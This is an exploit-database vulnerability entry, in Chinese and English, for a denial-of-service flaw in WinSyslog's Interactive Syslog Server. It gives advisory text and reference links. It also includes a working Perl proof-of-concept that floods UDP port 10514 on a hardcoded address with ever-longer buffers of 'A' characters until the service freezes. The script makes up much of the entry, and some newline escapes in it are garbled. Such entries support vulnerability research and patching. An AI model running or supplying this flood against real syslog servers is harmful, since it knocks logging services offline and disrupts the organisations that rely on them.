https://www.exploit-db.com/exploits/23242
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-381

WinSyslog是一款用于Windows的syslog日志服务程序。WinSyslog没有正确处理超长syslog消息，远程攻击者可以利用这个漏洞对日志服务器进行拒绝服务攻击。当程序通过监听端口(默认是10514/UDP)接收到多个超长syslog消息，可导致WinSyslog程序停止响应。

source: http://www.securityfocus.com/bid/8821/info

WinSyslog is prone to a remotely exploitable denial of service vulnerability. The issue exists in the Interactive Syslog Server specifically. This occurs when the program receives multiple excessive syslog messages via the port it listens on (10514/UDP by default). This is also reported to cause system instability, which is likely due to resource exhaustion.

The issue does not affect the WinSyslog or MonitorWare agent services. This issue affects versions of WinSyslog prior to 2003-09-15. The vendor has released hot fixes for the MonitorWare Agent product, which also includes the vulnerable component. 

#!/usr/bin/perl
#WinSyslog System Freeze Vulnerability

use IO::Socket;
$host = "192.168.1.44";
$port = "10514";
$data = "A";

$socket = IO::Socket::INET->new(Proto => "udp") or die "Socket error:
$@n";
$ipaddr = inet_aton($host) || $host;
$portaddr = sockaddr_in($port, $ipaddr);

for ($count = 0; $count < 1000; $count ++)
{
$buf = "";
$buf .= "A"x((600+$count)*4);

print "Length: ", length($buf), "n";
send($socket, $buf, 0, $portaddr);
print "sentn";
}

print "Donen";

来源:BID
名称:8821
链接:http://www.securityfocus.com/bid/8821
来源:XF
名称:winsyslog-long-syslog-dos(13428)
链接:http://xforce.iss.net/xforce/xfdb/13428
来源:www.securiteam.com
链接:http://www.securiteam.com/windowsntfocus/6L00F158KE.html
来源:www.adiscon.com
链接:http://www.adiscon.com/Common/en/advisory/2003-09-15.asp
来源：NSFOCUS
名称：5549
链接：http://www.nsfocus.net/vulndb/5549